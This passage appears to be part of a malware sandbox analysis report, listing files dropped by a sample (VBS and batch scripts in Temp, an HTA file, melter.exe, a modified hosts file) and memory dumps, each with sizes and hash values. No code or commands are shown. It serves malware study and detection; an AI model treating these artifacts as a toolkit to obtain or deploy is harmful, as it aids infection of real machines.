dc884c6a7bd2d8f7c53f77639736be34a6ff428b

SHA256
8b94c33739767abf1c14a25159201b30407a05d0cecb36431f4eea6c83f195ba

SHA512
d133f3d83dedc702ebc43e28787cbb35cdb3f71e757b8af8d2a5c8474c59423325c25c8f46f1f4a0a12cdbfb0e4a4717bfbc91f5b05c5b78f2698eccd32d4896

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD

Filesize
498B

MD5
90be2701c8112bebc6bd58a7de19846e

SHA1
a95be407036982392e2e684fb9ff6602ecad6f1e

SHA256
644fbcdc20086e16d57f31c5bad98be68d02b1c061938d2f5f91cbe88c871fbf

SHA512
d618b473b68b48d746c912ac5fc06c73b047bd35a44a6efc7a859fe1162d68015cf69da41a5db504dcbc4928e360c095b32a3b7792fcc6a38072e1ebd12e7cbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

Filesize
9KB

MD5
5433eab10c6b5c6d55b7cbd302426a39

SHA1
c5b1604b3350dab290d081eecd5389a895c58de5

SHA256
23dbf7014e99e93af5f2760f18ee1370274f06a453145c8d539b66d798dad131

SHA512
207b40d6bec65ab147f963a5f42263ae5bf39857987b439a4fa1647bf9b40e99cdc43ff68b7e2463aa9a948284126ac3c9c7af8350c91134b36d8b1a9c61fd34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e8eb51096d6f6781456fef7df731d97

SHA1
ec2aaf851a618fb43c3d040a13a71997c25bda43

SHA256
96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864

SHA512
0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
4b92d741d003e8d1f0394874017a6fe9

SHA1
1a4bebc2637bce160dae38d4d0bfdeb6b398059d

SHA256
8c8532230d71f0818daebff0d2ab496b02c25bdaa7156701f663b5474ad876fc

SHA512
5c2e84b072314aaae414f98f7dbeb13e030561b53270803d0cf7a8c6ed59368dcfdc4666e69abef39fcac5b75968a1174aca501023297a276a219ed0464612c6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7332074ae2b01262736b6fbd9e100dac

SHA1
22f992165065107cc9417fa4117240d84414a13c

SHA256
baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa

SHA512
4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
acede48f49e8026833a6e1bf72616add

SHA1
3da845d5a6982185e0dc50b24b0b57b8e7a0a448

SHA256
d235b714a3cccb7ef743776ce6c92f8584fb84bc5e65dcaba6771a9a0749f69a

SHA512
24bf778258cd2ff848c9f4948d4957a02d54cce6f4f9b1c4bee70acd60e396289f837a7e19cc98808bdb15a2f3f47a307d54117d0580b97079a7fd43655b3469

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
a67eee085e8f68aaffbfdb51503d6561

SHA1
29db9b41945c6a5d27d5836a1c780668eded65a0

SHA256
6e155bcc98f4e175a8701f030b73b14d9002b175ef58a19cb9010af3964e36b4

SHA512
7923bc74260e77d62b20cf510b79e0422563469ec3543084a989db154b1e39370f1a6e6c6e73caa7471d0974a693b1beb4fd2ddfb14b0b5c58650b5df3c32d81

Download Submit
C:\Users\Admin\AppData\Local\Temp\14329.vbs

Filesize
490B

MD5
93e179454db6fe9ac81112193de37cde

SHA1
4752aec95d506cac3ed9c61f0fbbd9cf6bd0cde9

SHA256
8286f8a1d4cceae4ece0de6082109286f17c1234ee09e453ac9507185068c7cc

SHA512
a38411dd6eb30050e6100bd20e79e8f4d650c1a4ad646516370f603a28900dfc424292f83cd7b49b1296bf7b25ce6ce907ef8dee964ded2e6b79475a6741f207

Download Submit
C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg

Filesize
27B

MD5
597cf1068c84a5c01afd9472a7453116

SHA1
bc9a638c47aab57b04b2257f421a48b2ee682732

SHA256
0d124f8aedb0b4461c31ee54f6d68ba1288b47c373a9bfe6c1a323e958836799

SHA512
3eaf9c358446ed124817d34523ad6155629f5d4ad11770f918fff6096d1d6f66ee790fac8488b908b424fd4761f0b26011b3e0a2b21bca406f73ca3fe1e17600

Download Submit
C:\Users\Admin\AppData\Local\Temp\19074.vbs

Filesize
236B

MD5
3a7e0a94fa88dccd40d9b76b37d06db1

SHA1
d7604ddb660898ce3b1343aa712cf5926bc68bda

SHA256
368a1589e414e50d554cf0d871bd49b11f9cd9f189876c86a5caef92d158e6a4

SHA512
19b8377a708301fb719e43433b9c0a592346ea94206870e3ba2c77f901b17598dd977fd711e591b5d0fc46982ed83e62cfbbe678eabe43de494bdde176c89fcb

Download Submit
C:\Users\Admin\AppData\Local\Temp\19267.vbs

Filesize
276B

MD5
8a9b451fd9936100f33b576bb5ec3f02

SHA1
80c92544f733ddfb96dffa296293fb2835e85f2e

SHA256
4e17707eab52e31f035b13f68cce1aa2636680abde9de955fdf1495641660455

SHA512
b11700e12cc1c921dbf3cd017595dbb18befdb5a89e80295aa99ef8d5d23d3e689bf6b011927da27cb88ac93feea8fcef822b4b7acd92c26b32d5791773e911f

Download Submit
C:\Users\Admin\AppData\Local\Temp\19628.bat

Filesize
461B

MD5
4a9699c0d134b2b5b1f58cc33674f45c

SHA1
8ee1d4225898740ec63d56e9600cfc5c742bacaf

SHA256
ad38dbcd5d795409da32568d5c041f73504b20925de468bac980ffc68680e0bd

SHA512
97273ca0bdbb9711139b2c3fad93bd64c865d35b65ce2c60d108966ce0f9ff4ab137c03e8de466770322309bd40c431367e30d796fa85d5c03219b36e67111f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\21446.vbs

Filesize
1KB

MD5
5f54089b9a444209633e886792a8505b

SHA1
3e3d5003c67de8657661e28bc2350f0e4ea72ee3

SHA256
c3107e49aae33c8a125d968ff8643fdba3ecb8049172daf103f3389e2ec135c4

SHA512
f684d5a376b826fe5ff1bb2a3ac73d378ea3e546e0e6ff6c5a77f991967d1b1d68180b3ab465936c98b7438b4b540a62b697d047fd2bef31456f4498a77ec118

Download Submit
C:\Users\Admin\AppData\Local\Temp\21446.vbs

Filesize
1KB

MD5
135594160762ab9dd80794d7b34ab32a

SHA1
638fef88bbb5d310c51eda07ca10918a482ad3ac

SHA256
531eef292dba871300a5b31d9601bab2b8c03be17cc0aa28e216f82a5df01fa0

SHA512
19a8b0024abb6e22103aaf8654619ee803cb8ae2bfd21d6bb7c648a4dfb1a06936144d308cc3d0ebdd86d38b87434d2e3a152f541153d42d03b4ad767b72b54d

Download Submit
C:\Users\Admin\AppData\Local\Temp\2561.vbs

Filesize
106B

MD5
ec385d968eea8bf5abe4587305f39c89

SHA1
6509b0bb7cb6432a4c723f37dc7593116ad57c64

SHA256
98adff52d2e37335bc6fb9811a2759ab8bd86c6ca116818114a0ab88474a6f96

SHA512
d5ff6edac9fcc50a634ff949268004bc396a07bb472fce532166140964acbbb4195e99a02dae8a426e2c4f7a9c64a89d283361340615d89ef7465acbab5b26a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\26117.vbs

Filesize
390B

MD5
aabbe725da9751315bbeeda4ef58d816

SHA1
476c78912d61e790a793c8e6606825f2b169947c

SHA256
0422247afae1a1556e7832c45f4f1913a61cbace2be53aad58967ea9e6315360

SHA512
0e1a523c947013a1a23574d125294270cb8c6b8e4fd97630f7c35122a33b9d95e7a073cbe23f0ed3f78246dd8b2db2c4401e994eace3b9e3bdbe696708b887dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\26847.vbs

Filesize
179B

MD5
523092d53a06f5b46778a0cd7c01d0fb

SHA1
221a8244271afdbe7ce105aaf189f1dbcfa57cdb

SHA256
09c2ca44b387ae9f69f0c001729c71313bae1d935ad99723a02ebfc0d2757c3e

SHA512
72015f1a996c56b6eab20590cdb2689124b87494a2ae8fb5fb0678dfb4bfd49046f66b23b0348a70942d74664e22051d5be5994de518414baa47ad81e77400eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\28486.vbs

Filesize
161B

MD5
e04b980f81eddd7fad10acdc27793002

SHA1
ad88c7e0bbaa4470a892af63b4ab1e0c460e09a8

SHA256
fd05de63104067166b2225248f89f5a8d9b86ae7c090b025e0b08f90054e0663

SHA512
636c561da9a8644d95bbcdb09f427c05012a3ce72c1dbfb430b156fcceffdf6708cd0a83133576eea8a070d16e01c4630e57c98f178c26c95d7767cb44025e36

Download Submit
C:\Users\Admin\AppData\Local\Temp\8BD5.tmp\8BD6.tmp\8BD7.bat

Filesize
8KB

MD5
0a45f9a236bbcd265c0c42f31a98b97f

SHA1
c959b0487c1ab6ed111bee3d1f80bcc3032125a4

SHA256
38e4173ae8927a3bea9499ab2b9141d8f42f39383478633b0a4b98c0c661d0ff

SHA512
2935422f584afd8fde06d8838621c94205aa2ae67397b1d3ed3cb2e4d80d67e53d84cef2eaae4d3ea3c4dfc5e9282d712aab458dcd29660f9ae1215258fa1c72

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bwu10jxo.u5n.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\melter.exe

Filesize
3KB

MD5
d9baac374cc96e41c9f86c669e53f61c

SHA1
b0ba67bfac3d23e718b3bfdfe120e5446d0229e8

SHA256
a1d883577bcb6c4f9de47b06fe97c370c09bddffb6569b6cf93576371bdbc412

SHA512
4ecdf8757e75b02da06a9d42a8ca62b9f2ef292dc04fa37d96603af78433f8aa9dd82fcf1e128a8f463b9691dcc1645b4a64e34f3c5d631f3a0e0670da0d0457

Download Submit
C:\Users\Admin\AppData\Local\Temp\risitas.hta

Filesize
511B

MD5
af25ddf889ed3804a85b487a95993a94

SHA1
e22ce7ce7e6b18400913de410be90fa79c2b6edb

SHA256
bfa65bf74a7c96fc8a0ffc527d2fb143d349059466d6248fe2c0d45212baa3ab

SHA512
8f5a9eef4daee35d9ff9e7a2f9c4ba92cc89a5443a9cf5e563dc23317a1546862b3b73be865ba1aa0e2668d5bee84d05fd66042171235a35347794ab6aa3297c

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
memory/3664-101-0x000002049D580000-0x000002049D5A2000-memory.dmp

Filesize
136KB

Download
memory/4348-126-0x000002C134060000-0x000002C1340D6000-memory.dmp

Filesize
472KB

Download
memory/4348-127-0x000002C1340E0000-0x000002C134130000-memory.dmp

Filesize
320KB

Download
memory/4348-128-0x000002C134130000-0x000002C13414E000-memory.dmp

Filesize
120KB

Download
memory/4348-162-0x000002C134020000-0x000002C13402A000-memory.dmp

Filesize
40KB

Download
memory/4348-163-0x000002C134150000-0x000002C134162000-memory.dmp

Filesize
72KB

Download
memory/4348-3-0x00007FFAA00A3000-0x00007FFAA00A5000-memory.dmp

Filesize
8KB

Download
memory/4348-2-0x000002C119870000-0x000002C1198B0000-memory.dmp

Filesize
256KB

Download